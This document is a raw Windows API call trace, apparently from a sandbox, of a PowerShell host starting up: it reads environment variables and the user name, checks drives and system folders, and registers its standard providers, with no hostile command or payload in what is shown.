	[0292.958] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x24c0b0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0292.958] CoTaskMemFree (pv=0x24c0b0) 
	[0292.958] CoTaskMemAlloc (cb=0x104) returned 0x24c0b0
	[0292.958] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x24c0b0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0292.958] CoTaskMemFree (pv=0x24c0b0) 
	[0292.958] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x12d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0292.958] SetErrorMode (uMode=0x1) returned 0x1
	[0292.958] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x12d2e0 | out: lpFileInformation=0x12d2e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0292.959] SetErrorMode (uMode=0x1) returned 0x1
	[0292.964] GetLogicalDrives () returned 0x4
	[0292.964] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x12ce40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0292.966] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0292.966] SetErrorMode (uMode=0x1) returned 0x1
	[0292.967] CoTaskMemAlloc (cb=0x68) returned 0x1b8a7170
	[0292.967] CoTaskMemAlloc (cb=0x68) returned 0x1b8a6fb0
	[0292.967] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b8a7170, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x12d2b0, lpMaximumComponentLength=0x12d2ac, lpFileSystemFlags=0x12d2a8, lpFileSystemNameBuffer=0x1b8a6fb0, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12d2b0*=0x9c354b42, lpMaximumComponentLength=0x12d2ac*=0xff, lpFileSystemFlags=0x12d2a8*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0292.967] CoTaskMemFree (pv=0x1b8a7170) 
	[0292.967] CoTaskMemFree (pv=0x1b8a6fb0) 
	[0292.967] SetErrorMode (uMode=0x1) returned 0x1
	[0292.967] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0292.969] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12cff0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0292.969] SetErrorMode (uMode=0x1) returned 0x1
	[0292.969] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12d250 | out: lpFileInformation=0x12d250*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0292.969] SetErrorMode (uMode=0x1) returned 0x1
	[0292.969] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12cff0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0292.969] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x12cea0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0292.969] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0292.970] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x12cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0292.970] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0292.971] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12ce20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0292.971] SetErrorMode (uMode=0x1) returned 0x1
	[0292.971] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12d080 | out: lpFileInformation=0x12d080*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0292.971] SetErrorMode (uMode=0x1) returned 0x1
	[0292.971] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12ce20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0292.971] SetErrorMode (uMode=0x1) returned 0x1
	[0292.972] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12d080 | out: lpFileInformation=0x12d080*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0292.972] SetErrorMode (uMode=0x1) returned 0x1
	[0292.972] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12cec0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0292.972] SetErrorMode (uMode=0x1) returned 0x1
	[0292.972] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12d120 | out: lpFileInformation=0x12d120*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0292.972] SetErrorMode (uMode=0x1) returned 0x1
	[0292.972] CoTaskMemAlloc (cb=0x804) returned 0x1b8b6600
	[0292.972] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8b6600, nSize=0x12d528 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d528) returned 0x1
	[0292.973] CoTaskMemFree (pv=0x1b8b6600) 
	[0292.973] CoTaskMemAlloc (cb=0x204) returned 0x206630
	[0292.973] GetUserNameW (in: lpBuffer=0x206630, pcbBuffer=0x12d568 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d568) returned 1
	[0292.973] CoTaskMemFree (pv=0x206630) 
	[0292.974] ReportEventW (hEventLog=0x1ba10008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2efa460*="FileSystem", lpRawData=0x2efa1f0) returned 1
	[0292.975] CoTaskMemAlloc (cb=0x104) returned 0x24c0b0
	[0292.975] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0292.975] CoTaskMemFree (pv=0x24c0b0) 
	[0292.976] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0292.976] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0292.977] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0292.977] CoTaskMemAlloc (cb=0x804) returned 0x1b8b6600
	[0292.977] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8b6600, nSize=0x12d528 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d528) returned 0x1
	[0292.977] CoTaskMemFree (pv=0x1b8b6600) 
	[0292.977] CoTaskMemAlloc (cb=0x204) returned 0x206630
	[0292.978] GetUserNameW (in: lpBuffer=0x206630, pcbBuffer=0x12d568 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d568) returned 1
	[0292.978] CoTaskMemFree (pv=0x206630) 
	[0292.978] ReportEventW (hEventLog=0x1ba10008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2effca0*="Function", lpRawData=0x2effa30) returned 1
	[0292.982] CoTaskMemAlloc (cb=0x104) returned 0x24c0b0
	[0292.982] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0292.982] CoTaskMemFree (pv=0x24c0b0) 
	[0293.632] CoTaskMemAlloc (cb=0x804) returned 0x1b8b6600
	[0293.632] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8b6600, nSize=0x12d528 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d528) returned 0x1
	[0293.632] CoTaskMemFree (pv=0x1b8b6600) 
	[0293.632] CoTaskMemAlloc (cb=0x204) returned 0x206630
	[0293.632] GetUserNameW (in: lpBuffer=0x206630, pcbBuffer=0x12d568 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d568) returned 1
	[0293.633] CoTaskMemFree (pv=0x206630) 
	[0293.633] ReportEventW (hEventLog=0x1ba10008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f31f30*="Registry", lpRawData=0x2f31cc0) returned 1
	[0293.766] CoTaskMemAlloc (cb=0x804) returned 0x1b8b6600
	[0293.766] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8b6600, nSize=0x12d528 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d528) returned 0x1
	[0293.767] CoTaskMemFree (pv=0x1b8b6600) 
	[0293.767] CoTaskMemAlloc (cb=0x204) returned 0x206630
	[0293.767] GetUserNameW (in: lpBuffer=0x206630, pcbBuffer=0x12d568 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d568) returned 1
	[0293.767] CoTaskMemFree (pv=0x206630) 
	[0293.767] ReportEventW (hEventLog=0x1ba10008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f37348*="Variable", lpRawData=0x2f370d8) returned 1
	[0293.926] CoTaskMemAlloc (cb=0x104) returned 0x24c0b0
	[0293.926] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0293.927] CoTaskMemFree (pv=0x24c0b0) 
	[0293.927] CoTaskMemAlloc (cb=0x104) returned 0x24c0b0
	[0293.927] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0293.928] CoTaskMemFree (pv=0x24c0b0) 
	[0294.559] CoTaskMemAlloc (cb=0x804) returned 0x1b8b6600
	[0294.559] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8b6600, nSize=0x12d528 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d528) returned 0x1
	[0294.559] CoTaskMemFree (pv=0x1b8b6600) 
	[0294.560] CoTaskMemAlloc (cb=0x204) returned 0x206630
	[0294.560] GetUserNameW (in: lpBuffer=0x206630, pcbBuffer=0x12d568 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d568) returned 1
	[0294.560] CoTaskMemFree (pv=0x206630) 
	[0294.560] ReportEventW (hEventLog=0x1ba10008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f4af60*="Certificate", lpRawData=0x2f4acf0) returned 1
	[0295.152] CoTaskMemAlloc (cb=0x104) returned 0x24c0b0
	[0295.152] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.152] CoTaskMemFree (pv=0x24c0b0) 
	[0295.156] GetLogicalDrives () returned 0x4
	[0295.156] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x12d1b0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0295.156] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0295.157] CoTaskMemAlloc (cb=0x20e) returned 0x257130
	[0295.157] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x257130 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0295.157] CoTaskMemFree (pv=0x257130) 
	[0295.159] CoTaskMemAlloc (cb=0x104) returned 0x24c0b0
	[0295.159] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.159] CoTaskMemFree (pv=0x24c0b0) 
	[0295.159] CoTaskMemAlloc (cb=0x104) returned 0x24c0b0
	[0295.159] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.159] CoTaskMemFree (pv=0x24c0b0) 
	[0295.178] CoTaskMemAlloc (cb=0x104) returned 0x24c0b0
	[0295.178] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.178] CoTaskMemFree (pv=0x24c0b0) 
	[0295.179] CoTaskMemAlloc (cb=0x104) returned 0x24c0b0
	[0295.179] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.180] CoTaskMemFree (pv=0x24c0b0) 
	[0295.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0295.180] SetErrorMode (uMode=0x1) returned 0x1
	[0295.180] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x12d170 | out: lpFileInformation=0x12d170*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0295.180] SetErrorMode (uMode=0x1) returned 0x1
	[0295.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0295.180] SetErrorMode (uMode=0x1) returned 0x1
	[0295.181] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x12d170 | out: lpFileInformation=0x12d170*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0295.181] SetErrorMode (uMode=0x1) returned 0x1
	[0295.181] CoTaskMemAlloc (cb=0x104) returned 0x24c0b0
	[0295.181] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c0b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.181] CoTaskMemFree (pv=0x24c0b0) 
	[0295.183] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0295.184] SetErrorMode (uMode=0x1) returned 0x1
	[0295.184] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12d130 | out: lpFileInformation=0x12d130*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0295.184] SetErrorMode (uMode=0x1) returned 0x1
	[0295.184] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12cf20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0295.184] SetErrorMode (uMode=0x1) returned 0x1
	[0295.185] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12d130 | out: lpFileInformation=0x12d130*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0295.185] SetErrorMode (uMode=0x1) returned 0x1
	[0295.185] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12cf30, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0295.185] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x12ce20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0295.185] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x12cf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0295.185] SetErrorMode (uMode=0x1) returned 0x1
	[0295.185] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x12d130 | out: lpFileInformation=0x12d130*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0295.185] SetErrorMode (uMode=0x1) returned 0x1
	[0295.186] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x12cf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0295.186] SetErrorMode (uMode=0x1) returned 0x1
	[0295.186] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x12d130 | out: lpFileInformation=0x12d130*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0295.186] SetErrorMode (uMode=0x1) returned 0x1
	[0295.186] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x12cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0295.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x12ce20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0295.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12cf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0295.186] SetErrorMode (uMode=0x1) returned 0x1
	[0295.186] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x12d130 | out: lpFileInformation=0x12d130*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0295.187] SetErrorMode (uMode=0x1) returned 0x1
	[0295.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12cf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0295.187] SetErrorMode (uMode=0x1) returned 0x1
	[0295.187] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x12d130 | out: lpFileInformation=0x12d130*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0295.187] SetErrorMode (uMode=0x1) returned 0x1
	[0295.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0295.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x12ce20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0295.188] SetErrorMode (uMode=0x1) returned 0x1
	[0295.188] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x12d170 | out: lpFileInformation=0x12d170*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0295.188] SetErrorMode (uMode=0x1) returned 0x1
	[0295.188] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x12cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0295.188] SetErrorMode (uMode=0x1) returned 0x1
	[0295.188] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x12d170 | out: lpFileInformation=0x12d170*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0295.188] SetErrorMode (uMode=0x1) returned 0x1
	[0295.188] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x12cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0295.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x12ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0295.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0295.189] SetErrorMode (uMode=0x1) returned 0x1
	[0295.189] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x12d170 | out: lpFileInformation=0x12d170*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0295.189] SetErrorMode (uMode=0x1) returned 0x1
	[0295.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0295.189] SetErrorMode (uMode=0x1) returned 0x1
	[0295.189] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x12d170 | out: lpFileInformation=0x12d170*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0295.189] SetErrorMode (uMode=0x1) returned 0x1
	[0295.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x12cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
